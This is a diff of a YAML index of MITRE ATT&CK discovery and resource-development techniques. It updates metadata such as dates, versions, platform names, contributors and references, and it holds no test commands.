-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1087.004
-        url: https://attack.mitre.org/techniques/T1087/004
-      - description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
-        url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
-        source_name: Microsoft msolrolemember
-      - description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
-          6, 2019.
-        url: https://github.com/True-Demon/raindance
-        source_name: GitHub Raindance
-      - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
-        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
-        source_name: Microsoft AZ CLI
-      - description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
-          Directory Leaks via Azure. Retrieved October 6, 2019.
-        url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
-        source_name: Black Hills Red Teaming MS AD Azure, 2018
-      - source_name: AWS List Roles
-        description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
-        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
-      - source_name: AWS List Users
-        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
-        description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
-      - source_name: Google Cloud - IAM Servie Accounts List API
-        url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
-        description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
-          August 4, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:51:18.808Z'
       name: Cloud Account
       description: "Adversaries may attempt to get a listing of cloud accounts. Cloud
         accounts are those created and configured by an organization for use by users,
@@ -50182,19 +50831,61 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
 
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - SaaS
+      - IaaS
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
+      created: '2020-02-21T21:08:36.570Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1087/004
+        external_id: T1087.004
+      - source_name: AWS List Roles
+        description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
+      - source_name: AWS List Users
+        description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
+      - source_name: Black Hills Red Teaming MS AD Azure, 2018
+        description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
+          Directory Leaks via Azure. Retrieved October 6, 2019.
+        url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
+      - source_name: Google Cloud - IAM Servie Accounts List API
+        description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
+          August 4, 2020.
+        url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
+      - source_name: Microsoft AZ CLI
+        description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
+      - source_name: Microsoft msolrolemember
+        description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
+      - source_name: GitHub Raindance
+        description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
+          6, 2019.
+        url: https://github.com/True-Demon/raindance
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1057:
     technique:
@@ -50265,46 +50956,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1057
     atomic_tests: []
   T1497.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
-      type: attack-pattern
-      created: '2020-03-06T21:04:12.454Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.002
-        url: https://attack.mitre.org/techniques/T1497/002
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Sans Virtual Jan 2016
-        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
-        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
-          Evasion Techniques. Retrieved April 17, 2019.
-      - source_name: Unit 42 Sofacy Nov 2018
-        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
-        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
-          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
-        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
-          LNK. Retrieved April 24, 2017.
-        source_name: FireEye FIN7 April 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.050Z'
       name: User Activity Based Checks
       description: "Adversaries may employ various user activity checks to detect
         and avoid virtualization and analysis environments. This may include changing
@@ -50328,6 +50984,9 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'User activity-based checks will likely occur in the first
         steps of an operation but may also occur throughout as an adversary learns
         the environment. Data and events should not be viewed in isolation, but as
@@ -50338,9 +50997,14 @@ discovery:
         processes being spawned that gather a variety of system information or perform
         other forms of Discovery, especially in a short period of time, may aid in
         detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -50350,12 +51014,39 @@ discovery:
       - Static File Analysis
       - Signature-based detection
       - Host forensic analysis
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+      created: '2020-03-06T21:04:12.454Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/002
+        external_id: T1497.002
+      - source_name: FireEye FIN7 April 2017
+        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+          LNK. Retrieved April 24, 2017.
+        url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+      - source_name: Unit 42 Sofacy Nov 2018
+        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+      - source_name: Sans Virtual Jan 2016
+        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+          Evasion Techniques. Retrieved April 17, 2019.
+        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1069.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:14:42.184Z'
       name: 'Permission Groups Discovery: Local Groups'
       description: |-
         Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
@@ -50398,12 +51089,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1069.001
     atomic_tests: []
   T1201:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:02:44.477Z'
       name: Password Policy Discovery
       description: |-
         Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
@@ -50414,28 +51104,31 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Regina Elwell
+      - Sudhanshu Chauhan, @Sudhanshu_C
+      - Isif Ibrahima, Mandiant
+      - Austin Clark, @c2defense
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor logs and processes for tools and command line arguments
         that may indicate they're being used for password policy discovery. Correlate
         that activity with other suspicious activity from the originating system to
         reduce potential false positives from valid user or administrator activity.
         Adversaries will likely attempt to find the password policy early in an operation
         and the activity is likely to happen with other Discovery activity.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - IaaS
       - Network
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.5'
-      x_mitre_contributors:
-      - Regina Elwell
-      - Sudhanshu Chauhan, @Sudhanshu_C
-      - Isif Ibrahima, Mandiant
-      - Austin Clark, @c2defense
+      - Identity Provider
+      - SaaS
+      - Office Suite
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Metadata'
       - 'Command: Command Execution'
@@ -50468,9 +51161,8 @@ discovery:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1201
     atomic_tests: []
   T1614.001:
@@ -50513,7 +51205,7 @@ discovery:
         description: Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses
           the Doppelgänging technique. Retrieved May 22, 2018.
         url: https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:00:56.174Z'
       name: 'System Location Discovery: System Language Discovery'
       description: "Adversaries may attempt to gather information about the system
         language of a victim in order to infer the geographical location of that host.
@@ -50552,13 +51244,11 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1614.001
     atomic_tests: []
   T1012:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-03T18:56:37.011Z'
       name: Query Registry
       description: |-
         Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
@@ -50599,87 +51289,85 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1012
     atomic_tests: []
   T1614:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      - macOS
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:07:23.511Z'
+      name: System Location Discovery
+      description: |2-
+
+        Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+        Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
+
+        Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: discovery
       x_mitre_contributors:
       - Pooja Natarajan, NEC Corporation India
       - Hiroki Nagahama, NEC Corporation
       - Manikantan Srinivasan, NEC Corporation India
       - Wes Hurd
       - Katie Nickels, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+        Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling <code> GetLocaleInfoW</code> to gather information.(Citation: FBI Ragnar Locker 2020)
+
+        Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      - IaaS
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Process: OS API Execution'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
       created: '2021-04-01T16:42:08.735Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1614
         url: https://attack.mitre.org/techniques/T1614
-      - source_name: FBI Ragnar Locker 2020
-        url: https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
-        description: FBI. (2020, November 19). Indicators of Compromise Associated
-          with Ragnar Locker Ransomware. Retrieved April 1, 2021.
-      - source_name: Sophos Geolocation 2016
-        url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
-        description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
-          target you based on where you live. Retrieved April 1, 2021.'
+        external_id: T1614
       - source_name: Bleepingcomputer RAT malware 2020
-        url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
         description: Abrams, L. (2020, October 23). New RAT malware gets commands
           via Discord, has ransomware feature. Retrieved April 1, 2021.
+        url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
       - source_name: AWS Instance Identity Documents
-        url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
         description: Amazon. (n.d.). Instance identity documents. Retrieved April
           2, 2021.
-      - source_name: Microsoft Azure Instance Metadata 2021
-        url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
-        description: Microsoft. (2021, February 21). Azure Instance Metadata Service
-          (Windows). Retrieved April 2, 2021.
+        url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
       - source_name: Securelist Trasparent Tribe 2020
-        url: https://securelist.com/transparent-tribe-part-1/98127/
         description: 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis,
           part 1. Retrieved April 1, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
-      name: System Location Discovery
-      description: |2-
-
-        Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
-        Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
-
-        Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: discovery
-      x_mitre_detection: |-
-        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
-        Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling <code> GetLocaleInfoW</code> to gather information.(Citation: FBI Ragnar Locker 2020)
-
-        Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
-      x_mitre_version: '1.0'
+        url: https://securelist.com/transparent-tribe-part-1/98127/
+      - source_name: FBI Ragnar Locker 2020
+        description: FBI. (2020, November 19). Indicators of Compromise Associated
+          with Ragnar Locker Ransomware. Retrieved September 12, 2024.
+        url: https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
+      - source_name: Microsoft Azure Instance Metadata 2021
+        description: Microsoft. (2021, February 21). Azure Instance Metadata Service
+          (Windows). Retrieved April 2, 2021.
+        url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
+      - source_name: Sophos Geolocation 2016
+        description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
+          target you based on where you live. Retrieved April 1, 2021.'
+        url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Process: OS API Execution'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1614
     atomic_tests: []
   T1518.001:
@@ -50732,17 +51420,16 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1518.001
     atomic_tests: []
   T1526:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Cloud Service Discovery
       description: |-
-        An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
+        An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
 
-        Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
+        Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
 
         For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
 
@@ -50750,10 +51437,12 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Suzy Schapperle - Microsoft Azure Red Team
       - Praetorian
       - Thanabodi Phrakhun, I-SECURE
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
@@ -50762,15 +51451,16 @@ discovery:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Enumeration'
+      - 'Logon Session: Logon Session Creation'
       type: attack-pattern
       id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
       created: '2019-08-30T13:01:10.120Z'
@@ -50798,9 +51488,6 @@ discovery:
         url: https://github.com/RhinoSecurityLabs/pacu
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1526
     atomic_tests: []
   T1018:
@@ -50875,7 +51562,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1018
     atomic_tests: []
   T1046:
@@ -50947,7 +51633,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1046
     atomic_tests: []
   T1518:
@@ -50996,12 +51681,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1518
     atomic_tests: []
   T1538:
     technique:
-      modified: '2024-04-19T04:25:33.300Z'
+      modified: '2024-10-15T15:51:56.279Z'
       name: Cloud Service Dashboard
       description: |-
         An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
@@ -51022,12 +51706,11 @@ discovery:
       - enterprise-attack
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - IaaS
-      - Google Workspace
       - SaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -51052,7 +51735,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1622:
     technique:
@@ -51107,7 +51789,7 @@ discovery:
         Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
 
         Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-16T15:05:55.918Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Debugger Evasion
       x_mitre_detection: |-
@@ -51127,7 +51809,6 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1622
     atomic_tests: []
   T1124:
@@ -51230,13 +51911,12 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1124
     atomic_tests: []
 resource-development:
   T1583:
     technique:
-      modified: '2024-02-28T21:13:02.648Z'
+      modified: '2024-10-16T20:03:59.884Z'
       name: Acquire Infrastructure
       description: |-
         Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.
@@ -51247,7 +51927,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Shailesh Tiwary (Indian Army)
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: "Consider use of services that may aid in tracking of newly
         acquired infrastructure, such as WHOIS databases for domain registration information.
@@ -51318,29 +51998,28 @@ resource-development:
